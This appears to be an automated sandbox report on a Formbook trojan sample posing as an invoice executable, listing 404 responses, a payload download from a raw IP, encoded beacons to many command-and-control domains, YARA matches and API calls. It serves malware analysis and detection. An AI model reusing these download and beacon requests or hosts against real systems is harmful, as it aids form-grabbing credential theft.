      Source: global traffic
      HTTP traffic detected: HTTP/1.1 404 Not Found
      Server: nginx
      Date: Fri, 07 Apr 2023 13:05:52 GMT
      Content-Type: text/html; charset=UTF-8
      X-Drupal-Cache: MISS
      Expires: Sun, 19 Nov 1978 05:00:00 GMT
      X-Content-Type-Options: nosniff
      X-Request-ID: v-ecd799fc-d544-11ed-98ba-d7dc276d6fef
      X-AH-Environment: prod
      Cache-Control: max-age=900, public
      Age: 0
      Via: varnish
      X-Cache: MISS
      Transfer-Encoding: chunked
      Connection: close
      Source: global traffic
      HTTP traffic detected: HTTP/1.1 404 Not Found
      Server: nginx
      Date: Fri, 07 Apr 2023 13:05:55 GMT
      Content-Type: text/html; charset=UTF-8
      X-Drupal-Cache: MISS
      Expires: Sun, 19 Nov 1978 05:00:00 GMT
      X-Content-Type-Options: nosniff
      X-Request-ID: v-ee6d028e-d544-11ed-8110-6f0c6e595f11
      X-AH-Environment: prod
      Cache-Control: max-age=900, public
      Age: 0
      Via: varnish
      X-Cache: MISS
      Transfer-Encoding: chunked
      Connection: close
      Source: global traffic
      HTTP traffic detected: HTTP/1.1 404 Not Found
      Server: nginx
      Date: Fri, 07 Apr 2023 13:05:58 GMT
      Content-Type: text/html; charset=UTF-8
      X-Drupal-Cache: MISS
      Expires: Sun, 19 Nov 1978 05:00:00 GMT
      X-Content-Type-Options: nosniff
      X-Request-ID: v-f001fa1e-d544-11ed-8770-433bb7c11ddd
      X-AH-Environment: prod
      Cache-Control: max-age=900, public
      Age: 0
      Via: varnish
      X-Cache: MISS
      Transfer-Encoding: chunked
      Connection: close
      Source: global traffic
      HTTP traffic detected: HTTP/1.1 404 Not Found
      Date: Fri, 07 Apr 2023 13:08:29 GMT
      Server: Apache
      X-ServerIndex: llim603
      Upgrade: h2,h2c
      Connection: Upgrade, close
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=UTF-8
      Source: global traffic
      HTTP traffic detected: HTTP/1.1 404 Not Found
      Date: Fri, 07 Apr 2023 13:08:32 GMT
      Server: Apache
      X-ServerIndex: llim605
      Upgrade: h2,h2c
      Connection: Upgrade, close
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=UTF-8
      Source: global traffic
      HTTP traffic detected: HTTP/1.1 404 Not Found
      Date: Fri, 07 Apr 2023 13:08:35 GMT
      Server: Apache
      X-ServerIndex: llim603
      Upgrade: h2,h2c
      Connection: Upgrade, close
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=UTF-8
      Source: global traffic
      HTTP traffic detected: HTTP/1.1 404 Not Found
      Date: Fri, 07 Apr 2023 13:08:37 GMT
      Server: Apache
      X-ServerIndex: llim603
      Upgrade: h2,h2c
      Connection: Upgrade, close
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=UTF-8
      Source: global traffic
      HTTP traffic detected: HTTP/1.1 404 Not Found
      Server: nginx
      Date: Fri, 07 Apr 2023 13:09:05 GMT
      Content-Type: text/html; charset=iso-8859-1
      Transfer-Encoding: chunked
      Connection: close
      Vary: Accept-Encoding
      Content-Encoding: gzip
      Source: global traffic
      HTTP traffic detected: HTTP/1.1 404 Not Found
      Server: nginx
      Date: Fri, 07 Apr 2023 13:09:08 GMT
      Content-Type: text/html; charset=iso-8859-1
      Transfer-Encoding: chunked
      Connection: close
      Vary: Accept-Encoding
      Content-Encoding: gzip
      Source: global traffic
      HTTP traffic detected: HTTP/1.1 404 Not Found
      Server: nginx
      Date: Fri, 07 Apr 2023 13:09:11 GMT
      Content-Type: text/html; charset=iso-8859-1
      Transfer-Encoding: chunked
      Connection: close
      Vary: Accept-Encoding
      Content-Encoding: gzip
      Source: global traffic
      HTTP traffic detected: HTTP/1.1 404 Not Found
      Server: nginx
      Date: Fri, 07 Apr 2023 13:09:14 GMT
      Content-Type: text/html; charset=iso-8859-1
      Content-Length: 315
      Connection: close
      Vary: Accept-Encoding
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global traffic
      HTTP traffic detected: HTTP/1.1 404 Not Found
      Date: Fri, 07 Apr 2023 13:09:19 GMT
      Server: Apache
      Content-Length: 389
      Connection: close
      Content-Type: text/html
      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global traffic
      HTTP traffic detected: HTTP/1.1 404 Not Found
      Date: Fri, 07 Apr 2023 13:09:22 GMT
      Server: Apache
      Content-Length: 389
      Connection: close
      Content-Type: text/html
      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Apr 2023 13:09:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Apr 2023 13:09:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: unknown TCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: control.exe, 00000006.00000002.66863003138.00000000074D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de
      Source: control.exe, 00000006.00000002.66863003138.00000000074D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/
      Source: control.exe, 00000006.00000002.66863003138.00000000074D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/email_website/homepage-baukasten/
      Source: control.exe, 00000006.00000002.66863003138.00000000074D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/login/
      Source: control.exe, 00000006.00000002.66863003138.00000000074D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/neue-top-level-domain/
      Source: control.exe, 00000006.00000002.66863003138.00000000074D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/unternehmen/datenschutz/
      Source: control.exe, 00000006.00000002.66863003138.00000000074D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/unternehmen/kontakt/
      Source: unknownHTTP traffic detected: POST /hhgu/ HTTP/1.1Host: www.sbreyuyufwkg.topConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.sbreyuyufwkg.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sbreyuyufwkg.top/hhgu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 59 47 38 46 55 36 3d 66 41 49 50 7e 2d 38 30 57 5f 62 6c 51 47 6d 72 67 5a 59 35 7e 73 39 41 42 56 4f 31 50 75 53 72 79 30 6f 4e 6a 59 70 73 36 30 63 5f 6d 36 64 69 66 67 68 37 4b 4e 55 31 4d 33 47 50 75 61 7a 4b 54 7a 43 77 48 54 70 57 59 6e 74 33 7a 47 68 50 76 74 79 55 45 47 49 41 55 70 41 6e 7e 7a 73 67 6b 44 7a 43 49 69 65 38 39 76 38 46 6c 45 79 52 66 31 44 6d 47 41 77 44 56 47 36 6f 58 76 31 41 58 31 70 77 35 45 54 4a 4d 36 74 4c 75 71 53 77 4a 35 5a 5a 58 39 4b 52 57 65 7e 69 57 31 33 6b 7e 46 6d 71 43 38 46 7a 64 37 4d 2d 65 55 5a 39 4c 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: YG8FU6=fAIP~-80W_blQGmrgZY5~s9ABVO1PuSry0oNjYps60c_m6difgh7KNU1M3GPuazKTzCwHTpWYnt3zGhPvtyUEGIAUpAn~zsgkDzCIie89v8FlEyRf1DmGAwDVG6oXv1AX1pw5ETJM6tLuqSwJ5ZZX9KRWe~iW13k~FmqC8Fzd7M-eUZ9Lg).
      Source: unknownDNS traffic detected: queries for: www.agtuscany.com
      Source: global trafficHTTP traffic detected: GET /sCgFrPXHcEhHCJiO9.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 124.71.228.145Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=s2yVyDL7KzYWld2BdQllerQcD/GF6Mxs58UQuk2i21kRVAHqZ0RMsLQ1NbuqhCdXsbgwTP46Di1eAkkh+vPQ+IE4AQZ9uoFzyQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.agtuscany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=SCgv9JMQILisbFXy0J496+0pVHmmIO+Ly3gehI9e6TsxoflXN3ldA6wZUkbmg/DjVxLMEiQQPVlU0RkFofCEWjsodLAn22oqlQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.sbreyuyufwkg.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=4R3N6uY2KEaFJv5My9X8USGNZqE5wTPbDqipWzMgLmbHXZCAQIUi45Gsr8vYyUhHcb6uJyCcXvi46UGuSQ6cKyZ2u3mWFt6EcQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.vinayakatlantis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=dPIut5mky1KNN3zaAHvK5uzPpNof944ctFAdSBvRpheGYi9HzhIM19d/tYr/fqq+9dholrExeaustykUUMhVEhiWpy+fLWahmQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.devplus.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=1M9SucmICtfCpW/tj24KyOiJ9IaacI1Z4pVA4dfz0JvHGrrKl77RqP3d2y7Nz1UNpIRISpOlczqUmSnOlFPJZEMF2BWLarf/yw==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.15076sediamonddr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=kRRBQ/bHU/W9UkuDtIhtwygoT2D+sgwDIfKWxYHlJR9zKl6zf2tjZKfdztRQYhwD69iGxc9L7QzSu5Kh6I4m2IOVDd3pVDElHQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.sberbankfinances.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=2lL86prNXw+vmyyBzvm6Umh532P/K5AtFx4XNAkjw5tRL10GW/bxxzkkZfLlzJDK7KhB1Fc3yjj6fN2xbdgxOm3+/L1UljmTkA==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.dg-computing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=tPdpg+5j5cq3G3NVrgN8qQtsNpTBX2RMNYYlH1Eb7GYZdMqdW/YxFnUShSiyKlH/vw8sFvVppHtL7VWmaInAWO//m3NzV9m1tQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.hangthanhlyonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=gHZL0JWG3wOj6ztmiiV4muoJdl40XHoCcWAONxG5u+5VwItf4ehZOc49QUmaHwAsTMDBmpaDBmzBHnJhASex2uEa6qd8Ly5Wpg==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.minevisn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=bwpeorSwTgARiOW1MBWRQEyO68F/6l/AZk25pS7qV2XiEzJGCZ7h2pTHq/m4oGuSc87Dx3lteJyHEz4BDWZ/BK+hpjxc5sLkyQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.aizhudai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=G2Pxnd335B1F0olFxFH9O2gOs4NA5qrQX1XeOZ+b9Vp4PayRZGChFWxI24R0kVFVx5D5YdtTUzFI+4LopIyzGr/eWdxAOOacEQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.ditchest.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=mD2cofacDINv4VIZu4+thbzlb3X2NPYZmRb9xa7ZzsWw/EQ9wRHnn15uVUQBxnXqiY2i38vokGI7Ta2M6WU2C3lENXSOdU9IMQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.explainqrs.buzzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=caybp/dMTc0WqC/7+5uISxKPk9DN3L4WvDWlcQ7l9xc33fFN4b4HHJNIJYe3LSUbMMu5GOPZ7e8ecQ82F95v7G1g+2VWlWzviQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.martabover.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004056DE

      E-Banking Fraud

      Source: Yara matchFile source: 00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.66851913423.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.62378186265.0000000035480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.66851591870.0000000003060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      Spam, unwanted Advertisements and Ransom Demands

      Source: control.exe, 00000006.00000003.62576801263.0000000007FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
      Source: control.exe, 00000006.00000003.62576801263.0000000007FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ
      Source: control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
      Source: control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ

      System Summary

      Source: 00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000006.00000002.66851913423.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.66851913423.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000004.00000002.62378186265.0000000035480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.62378186265.0000000035480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000006.00000002.66851591870.0000000003060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.66851591870.0000000003060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: initial sampleStatic PE information: Filename: AWB_Invoice.exe
      Source: AWB_Invoice.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000006.00000002.66851913423.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.66851913423.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000004.00000002.62378186265.0000000035480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.62378186265.0000000035480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000006.00000002.66851591870.0000000003060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.66851591870.0000000003060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: String function: 3589E692 appears 75 times
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: String function: 3581B910 appears 168 times
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: String function: 358AEF10 appears 85 times
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: String function: 35877BE4 appears 73 times
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358634E0 NtCreateMutant,LdrInitializeThunk,4_2_358634E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862DA0 NtReadVirtualMemory,LdrInitializeThunk,4_2_35862DA0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_35862DC0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_35862D10
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862CF0 NtDelayExecution,LdrInitializeThunk,4_2_35862CF0
